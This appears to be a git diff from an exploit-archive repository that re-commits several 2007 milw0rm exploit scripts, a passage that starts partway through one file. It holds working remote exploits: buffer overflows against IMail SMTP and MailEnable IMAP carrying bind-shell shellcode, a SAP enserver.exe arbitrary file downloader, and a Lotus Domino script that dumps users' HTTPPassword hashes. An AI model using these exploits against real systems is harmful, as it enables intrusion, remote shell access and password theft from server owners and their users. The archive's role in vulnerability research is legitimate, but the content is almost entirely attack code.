Versio\n"; +print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n"; +print "--------------------------------------------------------------------\n"; +} + +use IO::Socket::INET; + +my $host = 10.0.0.2; +my $port = 25; +my $reply; +my $request; +my $happystack="\x81\xc4\xff\xef\xff\xff\x44"; + + + +foreach (@ARGV) { +$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); +$eip = $1 if ($_=~/-o(.*)/); +} + +switch ($eip) { +case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12 +case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10 +} + + + +# win32_bind - EXITFUNC=seh LPORT=4444 + +my $shellcode = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93". +"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9". +"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd". +"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf". +"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e". +"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd". +"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd". +"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66". 
+"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6". +"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34". +"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65". +"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7". +"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e". +"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f". +"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61". +"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66". +"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b". +"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9". +"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67". +"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6". +"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69". +"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; + + +my $nop="\x41"x137; + +my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n"; + + +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); +$socket or die "Cannot connect to host!\n"; + +recv($socket, $reply, 1024, 0); +print "Response:" . $reply; + + +$request = "EHLO " . "\r\n"; +send $socket, $request, 0; +print "[+] Sent EHLO\n"; +recv($socket, $reply, 1024, 0); +print "Response:" . $reply; + + +$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n"; +send $socket, $request, 0; +print "[+] Sent MAIL FROM\n"; +recv($socket, $reply, 1024, 0); +print "Response:" . $reply; + + + + +$request = $buffer; +send $socket, $request, 0; +print "[+] Sent malicius request\n"; +close $socket; + + + +print " + connect on port 4444 of $host ...\n"; +sleep(3); +system("telnet $host 4444"); +exit; + +# milw0rm.com [2007-02-04] diff --git a/platforms/windows/remote/3279.html b/platforms/windows/remote/3279.html index cfb69c805..b199ce4e6 100755 
--- a/platforms/windows/remote/3279.html +++ b/platforms/windows/remote/3279.html @@ -1,57 +1,57 @@ -/************************************************************************************************ -Alipay ActiveX Remote Code Execute Exploit,enjoy it:) -by cocoruder(frankruder_at_hotmail.com) -http://ruder.cdut.net -*************************************************************************************************/ - - - - - - - - - - - - -# milw0rm.com [2007-02-06] +/************************************************************************************************ +Alipay ActiveX Remote Code Execute Exploit,enjoy it:) +by cocoruder(frankruder_at_hotmail.com) +http://ruder.cdut.net +*************************************************************************************************/ + + + + + + + + + + + + +# milw0rm.com [2007-02-06] diff --git a/platforms/windows/remote/3291.pl b/platforms/windows/remote/3291.pl index fee55f2da..b26c40e7b 100755 --- a/platforms/windows/remote/3291.pl +++ b/platforms/windows/remote/3291.pl 
@@ -1,105 +1,105 @@ -#!/usr/bin/perl -w - -## -## SAP 'enserver.exe' file downloader -## Tested on "SAP Web Application Server Java 6.40" (eval DVD) -## Found & coded by Nicob -## -## The downloaded file is limited to the first 32 kilobytes -## Usual port : TCP/3200+SYSNR -## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini" -## -## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) : -## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E) -## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp -## -## File parameter : -## C:\boot.ini -## \\10.11.12.13\share\image.jpg -## ..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !) -## - -# Init - -use strict; -use IO::Socket; - -my $verbose = 0; -# Set this to anything not null to crash the process -my $crash = ""; - -my $socket; -my $reply; - -$|=1; - -# Get arguments - -if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 ()\n";} -my $host=$ARGV[0]; -my $port=$ARGV[1]; -my $filename=$ARGV[2]; -my $output=$ARGV[3]; - -# Calculate variables - -my $lg = length($filename); -my $tag1 = sprintf('%x', 0x4F + $lg); -my $tag2 = sprintf('%x', 0x20 + $lg); - -# Show banner - -print "#####################################################################\n"; -print "### SAP 'enserver.exe' file downloader\n"; -print "### Downloading '$filename' from '$host'\n"; -print "#####################################################################\n\n"; - -# Define the packets - -my $packet1 = - "0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003". # Static - "5f6e69636f625f6e69636f625f6e69636f62315f". # ASCII string : "_nicob_nicob_nicob1_" - "00000000020000003b0000000500000002000000060000000400000001"; # Static - -my $packet2 = - "000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 . 
- "03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 . - "0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144"; # Crash if bad filename length - -# Create the socket - -$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port) - || die "Connection refused at [$host:$port]"; - -# Send the two packet - -print $socket pack("H*",$packet1); -print $socket pack("H*",$packet2); - -sleep 2; - -# Read and display response - -recv($socket,$reply,150000,MSG_PEEK); -if ($reply =~ /^(.*)#EAD(.*)$/s) { - print "File received !\n"; - if ((!defined($output)) or ($output eq "")) { - print "\n===========================================\n"; - print $2; - print "\n===========================================\n"; - } else { - open(OUT, "> $output") || die "Can't open $output ($0)"; - print "File saved as '$output'\n"; - print OUT $2; - close(OUT); - } -} else { - print "Problem interpreting reply :-(\n"; -} - -# Close the socket - -print "\nThe end ...\n"; -close $socket; - -# milw0rm.com [2007-02-08] +#!/usr/bin/perl -w + +## +## SAP 'enserver.exe' file downloader +## Tested on "SAP Web Application Server Java 6.40" (eval DVD) +## Found & coded by Nicob +## +## The downloaded file is limited to the first 32 kilobytes +## Usual port : TCP/3200+SYSNR +## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini" +## +## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) : +## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E) +## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp +## +## File parameter : +## C:\boot.ini +## \\10.11.12.13\share\image.jpg +## ..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !) 
+## + +# Init + +use strict; +use IO::Socket; + +my $verbose = 0; +# Set this to anything not null to crash the process +my $crash = ""; + +my $socket; +my $reply; + +$|=1; + +# Get arguments + +if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 ()\n";} +my $host=$ARGV[0]; +my $port=$ARGV[1]; +my $filename=$ARGV[2]; +my $output=$ARGV[3]; + +# Calculate variables + +my $lg = length($filename); +my $tag1 = sprintf('%x', 0x4F + $lg); +my $tag2 = sprintf('%x', 0x20 + $lg); + +# Show banner + +print "#####################################################################\n"; +print "### SAP 'enserver.exe' file downloader\n"; +print "### Downloading '$filename' from '$host'\n"; +print "#####################################################################\n\n"; + +# Define the packets + +my $packet1 = + "0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003". # Static + "5f6e69636f625f6e69636f625f6e69636f62315f". # ASCII string : "_nicob_nicob_nicob1_" + "00000000020000003b0000000500000002000000060000000400000001"; # Static + +my $packet2 = + "000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 . + "03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 . + "0000000000007d00000000000000000000000000". unpack("H*",$filename) . 
$crash ."000023454144"; # Crash if bad filename length + +# Create the socket + +$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port) + || die "Connection refused at [$host:$port]"; + +# Send the two packet + +print $socket pack("H*",$packet1); +print $socket pack("H*",$packet2); + +sleep 2; + +# Read and display response + +recv($socket,$reply,150000,MSG_PEEK); +if ($reply =~ /^(.*)#EAD(.*)$/s) { + print "File received !\n"; + if ((!defined($output)) or ($output eq "")) { + print "\n===========================================\n"; + print $2; + print "\n===========================================\n"; + } else { + open(OUT, "> $output") || die "Can't open $output ($0)"; + print "File saved as '$output'\n"; + print OUT $2; + close(OUT); + } +} else { + print "Problem interpreting reply :-(\n"; +} + +# Close the socket + +print "\nThe end ...\n"; +close $socket; + +# milw0rm.com [2007-02-08] diff --git a/platforms/windows/remote/3302.sh b/platforms/windows/remote/3302.sh index 55230a035..b8d0d19ca 100755 --- a/platforms/windows/remote/3302.sh +++ b/platforms/windows/remote/3302.sh 
@@ -1,139 +1,139 @@ -#!/bin/bash - -# -# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $ -# -# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump -# Copyright (c) 2007 Marco Ivaldi -# -# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, -# stores sensitive data from names.nsf in hidden form fields, which allows -# remote attackers to read the HTML source to obtain sensitive information such -# as (1) the password hash in the HTTPPassword field, (2) the password change -# date in the HTTPPasswordChangeDate field, (3) the client platform in the -# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and -# (5) the client Lotus Domino release in the ClntBld field, a different -# vulnerability than CVE-2005-2696 (CVE-2005-2428). -# -# According to testing, it's possible to dump all HTTPPassword hashes using the -# $defaultview view instead of $users. This saves a considerable amount of time. -# -# The code may require some changes to properly work with your configuration. -# -# See also: -# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml -# -# Usage: -# $ ./raptor_dominohash 192.168.0.202 -# [...] -# Extracting the view entries... -# Done! 656 unique entries have been found. -# Now ready to dump password hashes... -# [...] -# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3] -# FirstName: Foo -# LastName: Bar -# ShortName: fbar -# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4) -# [...] -# -# Vulnerable platforms: -# Lotus Domino R6 Webmail [tested] -# Lotus Domino R5 Webmail [untested] -# Lotus Domino R4 Webmail? 
[untested] -# - -# Some vars -i=1 -tmp1=dominohash1.tmp -tmp2=dominohash2.tmp - -# Command line -host=$1 - -# Local fuctions -function header() { - echo "" - echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump" - echo "Copyright (c) 2007 Marco Ivaldi " - echo "" -} - -function footer() { - echo "" - exit 0 -} - -function usage() { - header - echo "usage : ./raptor_dominohash " - echo "example: ./raptor_dominohash 192.168.0.202" - footer -} - -function notfound() { - header - echo "error : curl not found" - footer -} - -# Check if curl is there -curl=`which curl 2>/dev/null` -if [ $? -ne 0 ]; then - notfound -fi - -# Input control -if [ -z "$1" ]; then - usage -fi - -# Remove temporary files -rm -f $tmp1 -rm -f $tmp2 - -header - -# Extract the view entries -echo "Extracting the view entries..." -while : -do - curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1 - - # Check grep return value - if [ $? -ne 0 ]; then - break - fi - - # Go for the next page - i=`expr $i + 30` - echo -ne "\b\b\b\b\b\b\b\b$i" -done - -cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2 - -# Check if some view entries have been found -if [ ! -s $tmp2 ]; then - echo "No entries found on host ${host}!" - footer -fi -echo -ne "\b\b\b\b\b\b\b\bDone! " -echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found." -echo "" - -# Perform the hash dumping -echo "Now ready to dump password hashes..." 
-echo "" -sleep 4 -for unid in `cat $tmp2` -do - echo "[http://${host}/names.nsf/\$defaultview/${unid}]" - echo "" - #curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"' - curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">' - echo "" -done - -footer - -# milw0rm.com [2007-02-13] +#!/bin/bash + +# +# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $ +# +# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump +# Copyright (c) 2007 Marco Ivaldi +# +# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, +# stores sensitive data from names.nsf in hidden form fields, which allows +# remote attackers to read the HTML source to obtain sensitive information such +# as (1) the password hash in the HTTPPassword field, (2) the password change +# date in the HTTPPasswordChangeDate field, (3) the client platform in the +# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and +# (5) the client Lotus Domino release in the ClntBld field, a different +# vulnerability than CVE-2005-2696 (CVE-2005-2428). +# +# According to testing, it's possible to dump all HTTPPassword hashes using the +# $defaultview view instead of $users. This saves a considerable amount of time. +# +# The code may require some changes to properly work with your configuration. +# +# See also: +# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml +# +# Usage: +# $ ./raptor_dominohash 192.168.0.202 +# [...] +# Extracting the view entries... +# Done! 656 unique entries have been found. +# Now ready to dump password hashes... +# [...] 
+# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3] +# FirstName: Foo +# LastName: Bar +# ShortName: fbar +# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4) +# [...] +# +# Vulnerable platforms: +# Lotus Domino R6 Webmail [tested] +# Lotus Domino R5 Webmail [untested] +# Lotus Domino R4 Webmail? [untested] +# + +# Some vars +i=1 +tmp1=dominohash1.tmp +tmp2=dominohash2.tmp + +# Command line +host=$1 + +# Local fuctions +function header() { + echo "" + echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump" + echo "Copyright (c) 2007 Marco Ivaldi " + echo "" +} + +function footer() { + echo "" + exit 0 +} + +function usage() { + header + echo "usage : ./raptor_dominohash " + echo "example: ./raptor_dominohash 192.168.0.202" + footer +} + +function notfound() { + header + echo "error : curl not found" + footer +} + +# Check if curl is there +curl=`which curl 2>/dev/null` +if [ $? -ne 0 ]; then + notfound +fi + +# Input control +if [ -z "$1" ]; then + usage +fi + +# Remove temporary files +rm -f $tmp1 +rm -f $tmp2 + +header + +# Extract the view entries +echo "Extracting the view entries..." +while : +do + curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1 + + # Check grep return value + if [ $? -ne 0 ]; then + break + fi + + # Go for the next page + i=`expr $i + 30` + echo -ne "\b\b\b\b\b\b\b\b$i" +done + +cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2 + +# Check if some view entries have been found +if [ ! -s $tmp2 ]; then + echo "No entries found on host ${host}!" + footer +fi +echo -ne "\b\b\b\b\b\b\b\bDone! " +echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found." +echo "" + +# Perform the hash dumping +echo "Now ready to dump password hashes..." 
+echo "" +sleep 4 +for unid in `cat $tmp2` +do + echo "[http://${host}/names.nsf/\$defaultview/${unid}]" + echo "" + #curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"' + curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">' + echo "" +done + +footer + +# milw0rm.com [2007-02-13] diff --git a/platforms/windows/remote/3319.pl b/platforms/windows/remote/3319.pl index d391fa92b..84c291014 100755 --- a/platforms/windows/remote/3319.pl +++ b/platforms/windows/remote/3319.pl 
@@ -1,132 +1,132 @@ -#!/usr/bin/perl -# -# maildisable-v3.pl -# -# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit -# by mu-b - Thu Nov 23 2006 -# -# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX -# Mail Enable Professional v2.33 (win32) -# Mail Enable Professional v2.34 (win32) -# -# what does this remind you off? -# Note: timing is quite critical with this!!, so change $send_delay -# if it doesn't work.... -# -######## - -use Getopt::Std; getopts('t:n:', \%arg); -use Socket; - -# metasploit win32 bindshell port 1337 -my $zshell_win32_bind = - "\x33\xc9\x83\xe9\xb0". - "\x81\xc4\xd0\xfd\xff\xff". - "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". - "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". - "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". - "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". - "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". - "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". - "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". - "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". - "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". - "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". - "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". - "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". - "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". - "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". - "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". - "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". - "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". - "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". - "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". 
- "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". - "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". - "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; - -# ff e4 -> jmp %esp -my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 - "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0 - "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061 - "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802 - "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 - "\xef\xbe\xad\xde" # DoS - ); - -&print_header; - -my $target; -my $offset; - -if (defined($arg{'t'})) { $target = $arg{'t'} } -if (defined($arg{'n'})) { $offset = $arg{'n'} } -if (!(defined($target))) { &usage; } -if (!(defined($offset))) { $offset = 0; } -if ($offset > $#offsets) { - print("only ".($#offsets+1)." targets known!!\n"); - exit(1); -} else { - $offset = $offsets[$offset]; -} - -my $imapd_port = 143; -my $send_delay = 2; - -my $NOP = 'A'; -my $START_PAD = 3; - -if (connect_host($target, $imapd_port)) { - print("-> * Connected\n"); - send(SOCKET, "1 LOGIN {1022}\r\n", 0); - sleep(2); - - print("-> * Sending padding payload\n"); - # first recv < 0x3fe, NULL tricks strncpy... - send(SOCKET, "\x00".($NOP x 1020), 0); - sleep($send_delay); - - print("-> * Sending payload\n"); - $buf = ($NOP x $START_PAD).# padding - "\xee\xaf\xdc\xba". # dummy var_0 - "\xef\xbe\xad\xde". # EBP - $offset. # EIP - "\xdc\xa3\x19\x03". # dummy arg_0 "\xdc\xa3\x19\x03" v2.33 - ($NOP x 4). # NOPS - $zshell_win32_bind. # hellcode - $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5); - - send(SOCKET, $buf, 0); - sleep($send_delay); - - print("-> * Successfully sent payload!\n"); - print("-> * nc ".$target." 
1337 for shell...\n"); -} - -sub print_header { - print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n"); - print("by: \n\n"); -} - -sub usage { - print(qq(Usage: $0 -t - - -t : hostname to test - -n : return addy offset number -)); - - exit(1); -} - -sub connect_host { - ($target, $port) = @_; - $iaddr = inet_aton($target) || die("Error: $!\n"); - $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); - $proto = getprotobyname('tcp') || die("Error: $!\n"); - - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); - connect(SOCKET, $paddr) || die("Error: $!\n"); - return(1338); -} - -# milw0rm.com [2007-02-16] +#!/usr/bin/perl +# +# maildisable-v3.pl +# +# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit +# by mu-b - Thu Nov 23 2006 +# +# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX +# Mail Enable Professional v2.33 (win32) +# Mail Enable Professional v2.34 (win32) +# +# what does this remind you off? +# Note: timing is quite critical with this!!, so change $send_delay +# if it doesn't work.... +# +######## + +use Getopt::Std; getopts('t:n:', \%arg); +use Socket; + +# metasploit win32 bindshell port 1337 +my $zshell_win32_bind = + "\x33\xc9\x83\xe9\xb0". + "\x81\xc4\xd0\xfd\xff\xff". + "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". + "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". + "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". + "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". + "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". + "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". + "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". + "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". + "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". + "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". 
+ "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". + "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". + "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". + "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". + "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". + "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". + "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". + "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". + "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". + "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". + "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". + "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; + +# ff e4 -> jmp %esp +my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 + "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0 + "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061 + "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802 + "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 + "\xef\xbe\xad\xde" # DoS + ); + +&print_header; + +my $target; +my $offset; + +if (defined($arg{'t'})) { $target = $arg{'t'} } +if (defined($arg{'n'})) { $offset = $arg{'n'} } +if (!(defined($target))) { &usage; } +if (!(defined($offset))) { $offset = 0; } +if ($offset > $#offsets) { + print("only ".($#offsets+1)." targets known!!\n"); + exit(1); +} else { + $offset = $offsets[$offset]; +} + +my $imapd_port = 143; +my $send_delay = 2; + +my $NOP = 'A'; +my $START_PAD = 3; + +if (connect_host($target, $imapd_port)) { + print("-> * Connected\n"); + send(SOCKET, "1 LOGIN {1022}\r\n", 0); + sleep(2); + + print("-> * Sending padding payload\n"); + # first recv < 0x3fe, NULL tricks strncpy... 
+ send(SOCKET, "\x00".($NOP x 1020), 0); + sleep($send_delay); + + print("-> * Sending payload\n"); + $buf = ($NOP x $START_PAD).# padding + "\xee\xaf\xdc\xba". # dummy var_0 + "\xef\xbe\xad\xde". # EBP + $offset. # EIP + "\xdc\xa3\x19\x03". # dummy arg_0 "\xdc\xa3\x19\x03" v2.33 + ($NOP x 4). # NOPS + $zshell_win32_bind. # hellcode + $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5); + + send(SOCKET, $buf, 0); + sleep($send_delay); + + print("-> * Successfully sent payload!\n"); + print("-> * nc ".$target." 1337 for shell...\n"); +} + +sub print_header { + print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n"); + print("by: \n\n"); +} + +sub usage { + print(qq(Usage: $0 -t + + -t : hostname to test + -n : return addy offset number +)); + + exit(1); +} + +sub connect_host { + ($target, $port) = @_; + $iaddr = inet_aton($target) || die("Error: $!\n"); + $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); + $proto = getprotobyname('tcp') || die("Error: $!\n"); + + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); + connect(SOCKET, $paddr) || die("Error: $!\n"); + return(1338); +} + +# milw0rm.com [2007-02-16] diff --git a/platforms/windows/remote/3320.pl b/platforms/windows/remote/3320.pl index 1af59244f..1ae4fe319 100755 --- a/platforms/windows/remote/3320.pl +++ b/platforms/windows/remote/3320.pl 
